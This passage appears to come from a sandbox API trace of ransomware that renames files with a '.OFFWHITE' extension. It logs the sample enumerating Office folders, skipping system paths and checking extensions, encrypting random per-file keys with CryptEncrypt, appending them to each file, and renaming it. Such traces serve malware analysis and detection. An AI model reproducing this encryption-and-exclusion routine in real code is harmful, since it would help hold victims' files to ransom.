lpOverlapped=0x0) returned 1 [0144.600] GetProcessHeap () returned 0x500000 [0144.600] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x927c0) returned 0x2a60020 [0144.601] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.601] ReadFile (in: hFile=0x218, lpBuffer=0x2a60020, nNumberOfBytesToRead=0x927c0, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesRead=0x295d1c0*=0x927c0, lpOverlapped=0x0) returned 1 [0144.666] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.669] WriteFile (in: hFile=0x218, lpBuffer=0x2a60020*, nNumberOfBytesToWrite=0x927c0, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x2a60020*, lpNumberOfBytesWritten=0x295d1cc*=0x927c0, lpOverlapped=0x0) returned 1 [0144.671] GetProcessHeap () returned 0x500000 [0144.671] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2a60020 | out: hHeap=0x500000) returned 1 [0144.675] CloseHandle (hObject=0x218) returned 1 [0144.675] GetProcessHeap () returned 0x500000 [0144.676] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.676] GetProcessHeap () returned 0x500000 [0144.676] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.676] GetProcessHeap () returned 0x500000 [0144.676] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.676] GetProcessHeap () returned 0x500000 [0144.676] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.676] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" [0144.676] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.OFFWHITE" [0144.676] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.REST.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.rest.trx_dll.offwhite")) returned 1 [0144.677] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa381000, ftCreationTime.dwHighDateTime=0x1cac7fb, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xaa381000, ftLastWriteTime.dwHighDateTime=0x1cac7fb, nFileSizeHigh=0x0, nFileSizeLow=0xb360, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="OMSINTL.DLL.trx_dll", cAlternateFileName="OMSINT~1.TRX")) returned 1 [0144.677] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2=".") returned 1 [0144.677] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="..") returned 1 [0144.677] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="...") returned 1 [0144.677] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="windows") returned -1 [0144.677] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0144.677] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="rsa") returned -1 [0144.677] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0144.677] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="programdata") returned -1 [0144.677] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0144.677] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="program files") returned -1 [0144.677] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0144.677] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.677] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="OMSINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" [0144.677] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.677] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.677] PathFindExtensionW (pszPath="OMSINTL.DLL.trx_dll") returned=".trx_dll" [0144.677] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.677] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.678] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.678] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.678] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.678] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.678] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.678] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.678] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.678] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.678] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.678] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.678] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.678] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.678] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.678] lstrcmpiW (lpString1="OMSINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.678] GetProcessHeap () returned 0x500000 [0144.678] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ea80 [0144.678] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.680] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=45920) returned 1 [0144.681] GetProcessHeap () returned 0x500000 [0144.681] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.681] GetProcessHeap () returned 0x500000 [0144.681] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.681] GetProcessHeap () returned 0x500000 [0144.681] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.681] GetProcessHeap () returned 0x500000 [0144.681] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.681] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.681] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.682] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.682] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.682] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.682] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.682] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.682] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.682] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.682] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.682] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.682] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.683] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xb360, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.683] SetLastError (dwErrCode=0x0) [0144.683] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.686] GetLastError () returned 0x0 [0144.687] GetLastError () returned 0x0 [0144.687] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xb460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.687] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.687] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0xb560, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.687] WriteFile (in: hFile=0x218, lpBuffer=0x52ea80*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52ea80*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.687] GetProcessHeap () returned 0x500000 [0144.687] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xb360) returned 0x5607c8 [0144.687] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.687] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0xb360, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0xb360, lpOverlapped=0x0) returned 1 [0144.691] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.691] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0xb360, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0xb360, lpOverlapped=0x0) returned 1 [0144.691] GetProcessHeap () returned 0x500000 [0144.692] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.692] CloseHandle (hObject=0x218) returned 1 [0144.692] GetProcessHeap () returned 0x500000 [0144.692] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.692] GetProcessHeap () returned 0x500000 [0144.692] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.692] GetProcessHeap () returned 0x500000 [0144.692] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.692] GetProcessHeap () returned 0x500000 [0144.692] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.692] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" [0144.692] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.OFFWHITE" [0144.692] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\OMSINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\omsintl.dll.trx_dll.offwhite")) returned 1 [0144.693] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7337cc00, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef27730, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7337cc00, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x7b60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="ONINTL.DLL.trx_dll", cAlternateFileName="ONINTL~1.TRX")) returned 1 [0144.693] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2=".") returned 1 [0144.693] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="..") returned 1 [0144.693] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="...") returned 1 [0144.693] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="windows") returned -1 [0144.693] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="$recycle.bin") returned 1 [0144.693] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="rsa") returned -1 [0144.693] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="ntuser.dat") returned 1 [0144.693] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="programdata") returned -1 [0144.693] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="appdata") returned 1 [0144.693] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="program files") returned -1 [0144.693] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="program files (x86)") returned -1 [0144.693] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.694] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="ONINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" [0144.694] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.694] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.694] PathFindExtensionW (pszPath="ONINTL.DLL.trx_dll") returned=".trx_dll" [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".exe") returned 1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".log") returned 1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".cab") returned 1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".cmd") returned 1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".com") returned 1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".cpl") returned 1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".ini") returned 1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".dll") returned 1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".url") returned -1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".ttf") returned -1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp3") returned 1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".pif") returned 1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".mp4") returned 1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".OFFWHITE") returned 1 [0144.694] lstrcmpiW (lpString1=".trx_dll", lpString2=".msi") returned 1 [0144.694] lstrcmpiW (lpString1="ONINTL.DLL.trx_dll", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.694] GetProcessHeap () returned 0x500000 [0144.694] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52ea90 [0144.694] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x218 [0144.696] GetFileSizeEx (in: hFile=0x218, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=31584) returned 1 [0144.696] GetProcessHeap () returned 0x500000 [0144.696] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5469f8 [0144.696] GetProcessHeap () returned 0x500000 [0144.696] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x546a10 [0144.696] GetProcessHeap () returned 0x500000 [0144.696] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fc80 [0144.696] GetProcessHeap () returned 0x500000 [0144.696] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55fd88 [0144.696] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.696] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.696] SystemFunction036 (in: RandomBuffer=0x5469f8, RandomBufferLength=0x10 | out: RandomBuffer=0x5469f8) returned 1 [0144.696] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.696] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.696] SystemFunction036 (in: RandomBuffer=0x546a10, RandomBufferLength=0x10 | out: RandomBuffer=0x546a10) returned 1 [0144.696] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.696] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.696] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55fc80*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.697] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.697] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.697] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55fd88*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.697] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x7b60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.697] SetLastError (dwErrCode=0x0) [0144.697] WriteFile (in: hFile=0x218, lpBuffer=0x55fc80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fc80*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.699] GetLastError () returned 0x0 [0144.699] GetLastError () returned 0x0 [0144.699] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x7c60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.699] WriteFile (in: hFile=0x218, lpBuffer=0x55fd88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x55fd88*, lpNumberOfBytesWritten=0x295d1cc*=0x100, lpOverlapped=0x0) returned 1 [0144.700] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x7d60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.700] WriteFile (in: hFile=0x218, lpBuffer=0x52ea90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x52ea90*, lpNumberOfBytesWritten=0x295d1cc*=0x8, lpOverlapped=0x0) returned 1 [0144.700] GetProcessHeap () returned 0x500000 [0144.700] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x7b60) returned 0x5607c8 [0144.700] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.700] ReadFile (in: hFile=0x218, lpBuffer=0x5607c8, nNumberOfBytesToRead=0x7b60, lpNumberOfBytesRead=0x295d1c0, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesRead=0x295d1c0*=0x7b60, lpOverlapped=0x0) returned 1 [0144.703] SetFilePointerEx (in: hFile=0x218, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.703] WriteFile (in: hFile=0x218, lpBuffer=0x5607c8*, nNumberOfBytesToWrite=0x7b60, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpBuffer=0x5607c8*, lpNumberOfBytesWritten=0x295d1cc*=0x7b60, lpOverlapped=0x0) returned 1 [0144.703] GetProcessHeap () returned 0x500000 [0144.703] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5607c8 | out: hHeap=0x500000) returned 1 [0144.703] CloseHandle (hObject=0x218) returned 1 [0144.703] GetProcessHeap () returned 0x500000 [0144.703] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fc80 | out: hHeap=0x500000) returned 1 [0144.703] GetProcessHeap () returned 0x500000 [0144.703] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55fd88 | out: hHeap=0x500000) returned 1 [0144.703] GetProcessHeap () returned 0x500000 [0144.704] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5469f8 | out: hHeap=0x500000) returned 1 [0144.704] GetProcessHeap () returned 0x500000 [0144.704] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546a10 | out: hHeap=0x500000) returned 1 [0144.704] lstrcpyW (in: lpString1=0x295cfb8, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" [0144.704] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.OFFWHITE") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.OFFWHITE" [0144.704] MoveFileW (lpExistingFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll"), lpNewFileName="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.DLL.trx_dll.OFFWHITE" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\onintl.dll.trx_dll.offwhite")) returned 1 [0144.705] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7337cc00, ftCreationTime.dwHighDateTime=0x1cacf6a, ftLastAccessTime.dwLowDateTime=0xeef4d890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x7337cc00, ftLastWriteTime.dwHighDateTime=0x1cacf6a, nFileSizeHigh=0x0, nFileSizeLow=0x3fb60, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="ONINTL.REST.trx_dll", cAlternateFileName="ONINTL~2.TRX")) returned 1 [0144.705] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2=".") returned 1 [0144.705] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="..") returned 1 [0144.705] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="...") returned 1 [0144.705] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="windows") returned -1 [0144.705] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="$recycle.bin") returned 1 [0144.705] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="rsa") returned -1 [0144.705] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0144.705] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="programdata") returned -1 [0144.705] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="appdata") returned 1 [0144.705] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="program files") returned -1 [0144.705] lstrcmpiW (lpString1="ONINTL.REST.trx_dll", lpString2="program files (x86)") returned -1 [0144.705] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\") returned="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\" [0144.705] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpString2="ONINTL.REST.trx_dll" | out: lpString1="C:/Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\ONINTL.REST.trx_dll") returned="C:/Users\\All 